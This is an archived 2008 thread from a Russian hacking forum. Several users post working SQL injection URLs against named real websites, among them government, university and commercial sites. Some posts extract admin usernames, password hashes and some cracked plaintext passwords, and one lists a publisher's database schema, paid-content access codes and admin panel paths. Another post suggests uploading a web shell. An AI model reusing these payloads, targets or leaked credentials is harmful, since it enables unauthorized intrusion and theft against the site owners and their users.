ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.07.2008, 02:37
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Сообщение от DDoSька
надо тему Антибояна важной сделать,а то так не удобно
-----------------------------------------------------------------
Код:
http://www.ccre.org/champs_activites_detail_news_en.htm?ID=963&idca=-3115+union+select+1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+information_schema.tables+limit+17,11/*
Блин,Все таблицы:
T_1005,T_1006,T_1007...итд
Код:
http://www.jezuk.co.uk/cgi-bin/view/arabica/log?id=-3591+union+select+1,2,3,4,5,6,7/*
///
http://www.jezuk.co.uk/cgi-bin/view/arabica/log?id=-1+union+select+1,2,3,4,concat_ws(0x3a,name,passwor d,email),6,7+from+users/*
пассы зашифрованы в DES )
Последний раз редактировалось ~!DoK_tOR!~; 16.07.2008 в 02:46..
|
|
|
16.07.2008, 04:47
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
сегодня у нас .RU
Koleso.Topof.ru - Информационный Ресурс о шинах, тесты шин - PR 4
http://koleso.topof.ru/testing_info.php?id=999999+union+select+1,2,concat _ws(0x3a,admin_login,admin_password),4,5,6,7+from+ admins/*
topof: 33d51f16ddaf72afb581e2a223c602a1 < 4f***...
http://koleso.topof.ru/testing_info.php?id=999999+union+select+1,2,unhex( hex(concat_ws(0x3a,username,user_password))),4,5,6 ,7+from+lotus_users+limit+1,1--
admin: 6a8da7a52d4684cc61ee8ed6bcc25f06 < 00d9a26f
Mtas.ru - PR 4
http://www.mtas.ru/second.php?ID=-1+union+select+concat_ws(0x3a,vcLogin,vcPassword)+ from+tadmins+limit+4,1/*
админка
Teatrdoc.ru - PR 4
http://www.teatrdoc.ru/plays.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
Viperson.ru - PR 4
http://www.viperson.ru/wind.php?ID=-1+union+select+version()/*
Game-ost.ru - PR 4
http://www.game-ost.ru/info.php?id=999999999+union+select+1,2,version(),4 ,5,6,7,8,9/*
Fondsk.ru - PR 4
http://www.fondsk.ru/article.php?id=9999999+union+select+unhex(hex(tabl e_name)),2+from+information_schema.tables+limit+24 ,1/*
Flirtanica.ru - PR 4
http://www.flirtanica.ru/articles1.php?id=9999999+union+select+1,concat_ws( 0x3a,version(),user(),database()),3,4,5/*
Последний раз редактировалось sabe; 16.07.2008 в 07:03..
|
|
|
|
16.07.2008, 12:18
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
Код:
http://www.rjb.csic.es/fichacurso.php?id=265
усе на мой взляд сделать тут больше не чего нельзя ( mysql 3 версии filepriv нема вообшем пусть будет для комплекта )
version()=3.23.58
user()=batonico@telperion.csic.es
database()=batonico |
|
|
|
16.07.2008, 16:36
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
Издательство Форум Медиа
http://www.forum-media.ru/blank.php?print_done=111&oid=4975'
http://www.forum-media.ru/blank.php?print_done=111&oid=4975+union+select+nul l,null,null,null,null--
http://www.forum-media.ru/blank.php?print_done=111&oid=4975+union+select+nul l,current_database(),null,null,null--
http://www.forum-media.ru/blank.php?print_done=111&oid=4975+union+select+nul l,version(),null,null,null--
http://www.forum-media.ru/blank.php?print_done=111&oid=4975+union+select+nul l,current_user,null,null,null--
VERSION(): PostgreSQL 7.4.19 on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 3.4.6 20060404 (Red Hat 3.4.6-9)
CURRENT_DATABASE(): forummed_forummed
CURRENT_USER: forummed
Список таблиц:
Код:
applicable_roles
check_constraints
column_domain_usage
column_privileges
columns
column_udt_usage
constraint_column_usage
constraint_table_usage
data_type_privileges
docfiles
domain_constraints
domains
domain_udt_usage
element_types
enabled_roles
forumbusket
forumnews
forumorders
forumusers
information_schema_catalog_name
key_column_usage
parameters
partners
pg_aggregate
pg_am
pg_amop
pg_amproc
pg_attrdef
pg_attribute
pg_cast
pg_class
pg_constraint
pg_conversion
pg_database
pg_depend
pg_description
pg_group
pg_index
pg_indexes
pg_inherits
pg_language
pg_largeobject
pg_listener
pg_locks
pg_namespace
pg_opclass
pg_operator
pg_proc
pg_rewrite
pg_rules
pg_settings
pg_stat_activity
pg_stat_all_indexes
pg_stat_all_tables
pg_stat_database
pg_statio_all_indexes
pg_statio_all_sequences
pg_statio_all_tables
pg_statio_sys_indexes
pg_statio_sys_sequences
pg_statio_sys_tables
pg_statio_user_indexes
pg_statio_user_sequences
pg_statio_user_tables
pg_stats
pg_stat_sys_indexes
pg_stat_sys_tables
pg_stat_user_indexes
pg_stat_user_tables
pg_tables
pg_trigger
pg_type
pg_user
pg_views
referential_constraints
role_column_grants
role_routine_grants
role_table_grants
role_usage_grants
routine_privileges
routines
rubr_section
schemata
secpasswd
sendsubs
spravochniks
sql_features
sql_implementation_info
sql_languages
sql_packages
sql_sizing
sql_sizing_profiles
stats
table_constraints
table_privileges
tables
triggered_update_columns
triggers
usage_privileges
view_column_usage
views
view_table_usage
voting1
voting2
Столбцы:
Код:
*************************************
docfiles
-------------------------------------
name
namefile
spr_id
*************************************
forumbusket
-------------------------------------
orderid
productid
qua
*************************************
forumnews
-------------------------------------
id
news
odate
stat
topic
*************************************
forumorders
-------------------------------------
cdate
id
ips
refer
uid
*************************************
forumusers
-------------------------------------
codefax
codephone
email
fax
fio
firm
id
inn
kpp
login
numb
passwd
persons
phone
region
street
subs
subs_1
subs_2
subs_3
subs_4
to_do
uraddress
zip
*************************************
partners
-------------------------------------
id
name
refer
*************************************
rubr_section
-------------------------------------
numb
rubr
sec_file
section
stat
*************************************
secpasswd
-------------------------------------
cid
files
passwd
*************************************
sendsubs
-------------------------------------
cdate
status
substext
theme
*************************************
spravochniks
-------------------------------------
aname
aname2
anno
cid
compl
isbn
name
oglav
pages
period
pict
price
stat
types
*************************************
voting1
-------------------------------------
address
bezprod1
bezprod2
bezprod3
businesslike
contactgood
convenient
deliver
email
fax
fio
friendly
helpfull
highquality
id
kritik
not_importunate
operat
phone
practical
uident
useful
valueformoney
*************************************
voting2
-------------------------------------
address
bezprod1
bezprod2
bezprod3
businesslike
contactgood
convenient
deliver
email
fax
fio
friendly
helpfull
highquality
id
kritik
not_importunate
operat
phone
practical
uident
useful
valueformoney
*************************************
Выведем список юзеров:
http://www.forum-media.ru/blank.php?print_done=111&oid=4975+union+select+id, login,null,passwd,null+from+forumusers--
Выведем коды для доступа к зоне обновлений:
http://www.forum-media.ru/blank.php?print_done=111&oid=4975+union+select+cid ,files,null,passwd,null+from+secpasswd--
Страница обновлений находится здесь:
http://www.forum-media.ru/takebonus.php
Дополнительные материалы к справочнику "ISO 9001": 267294
Дополнительные материалы к справочнику "Ответственность генерального директора": 464724
Дополнительные материалы к справочнику "Новое в Трудовом законодательстве": 167647
Дополнительные материалы к справочнику "Государственный и муниципальный заказ": 220665
Так же обновления безо всяких заморочек можно скачать отсюда:
http://www.forum-media.ru/doc/bonus/1000/
http://www.forum-media.ru/doc/bonus/1001/
Просто интересная папка, доступная для просмотра:
http://www.forum-media.ru/includs/
Админка:
http://www.forum-media.ru/admin
|
|
|
|
16.07.2008, 17:18
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
http://www.monsun-biz.com/auctiondetails.php?id=-101462'+union+select+concat_ws(0x3A3a,id,username, password,created,lastlogin,level)+from+probid_admi ns/*
http://www.monsun-biz.com/admin/login.php админка
admin::a8954ce2b9264ae3a1e80e8f3cc211dc ::nitesH
Кавычки не экранируются. Можно попробовать залить шелл.
http://www.keylinedesigns.com/hosting.php?id=-5+union+select+version()/*
http://admin.keylinedesigns.com/
5.0.45-log
adminUser
-tbenson::*77EF3F8AA5E975577A3372CF87C8450F560F608C :: Jackass00
Последний раз редактировалось Imperou$; 16.07.2008 в 17:22..
|
|
|
|
16.07.2008, 20:22
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Fm.gov.lv - PR 6
http://www.fm.gov.lv/index.php?id=-1+union+select+version()/*
mysql 4 - определил по ошибке information_schema.tables
к mysql.user access denied
http://www.fm.gov.lv/index.php?id=-1+union+select+concat_ws(0x3a,username,password)+f rom+users/*
поидее есть такая колонка..
Biodiversityscotland.gov.uk - PR 5
http://www.biodiversityscotland.gov.uk/pageType2.php?id=35&type=2&navID=-92+union+select+unhex(hex(version())),2,3,4,5,6/*
mysql 4 - определил по ошибке information_schema.tables
Chuvprok.gov.ru - Прокуратура ЧП - PR 4
http://www.chuvprok.gov.ru/news.php?id=99999+union+select+1,version(),3,4,5--
Последний раз редактировалось sabe; 16.07.2008 в 20:56..
|
|
|
|
16.07.2008, 20:50
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
EDU
http://www.de.pdx.edu/webct/info.php?page=50+order+by+3/*
вывод слева в меню
file_priv=0 ((
DB`s:
cavsdb
hdkb
irsweb
-> users
Version: 5.0.37
Dbname: irsweb
Username: cavsdb_dummy@bestla.oit.pdx.edu
Последний раз редактировалось $n@ke; 16.07.2008 в 20:54..
|
|
|
|
16.07.2008, 21:00
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Tuba.gov.tr - PR 6
http://www.tuba.gov.tr/index.php?id=99999999'+union+select+unhex(hex(tabl e_name))+from+information_schema.tables+limit+39,1/*
5 ветка, смотрим таблицы
http://www.tuba.gov.tr/index.php?id=99999999'+union+select+unhex(hex(colu mn_name))+from+information_schema.columns+where+ta ble_name=0x745f6c6f67696e+limit+0,1/*
достаем колонки из нужной таблы..
http://www.tuba.gov.tr/index.php?id=99999999'+union+select+unhex(hex(conc at_ws(0x3a,username,password)))+from+db_tuba.t_log in/*
достаем данные..)
admin: f1aacbce49efbd4edec3116379e28aae
Armagh.gov.uk - PR 5
http://www.armagh.gov.uk/news_item.php?id=99999999'+union+select+1,concat(0 x20,version(),0x2020202020202020a9206861636b656420 627920564954414c),3,4,5,6/*
GG.gov.au - PR 5
http://www.gg.gov.au/governorgeneral/content.php?id=-25+union+select+1,2,unhex(hex(version())),4,5,6,7, 8,9,10,11,12,13/*
Последний раз редактировалось sabe; 16.07.2008 в 23:01..
|
|
|
|
16.07.2008, 21:11
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
carthage. edu - PR7
http://www.carthage.edu/admissions/life/clubs.cfm?org=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
user() - wwwrun@localhost
version() - 5.0.22-log
databse() - handbook
cofc. edu - PR7
http://www.cofc.edu/music/events/main.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*
user() - sota@localhost
version() - 4.1.20
databse() - sota
alum.chatham. edu - PR6
http://alum.chatham.edu/alumni/get_gallery.cfm?ID=@@version--
system_user - webuser
db_name() - Alumnae
disability.tamu. edu - PR6
http://disability.tamu.edu/accessresult.asp?bldgnum=@@version--
system_user - casemanweb
db_name() - CaseMan
ccis. edu - PR6
http://www.ccis.edu/newsroom/?Story=1'+or+1=@@version--
system_user - ccweb
db_name() - News
|
|
|
|
16.07.2008, 21:11
|
|
Новичок
Регистрация: 07.07.2007
Сообщений: 21
Провел на форуме:
95348
Репутация:
1
|
|
http://www.gut.dloadshop.com/GUSTORecords/shop.asp?AID=308'
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
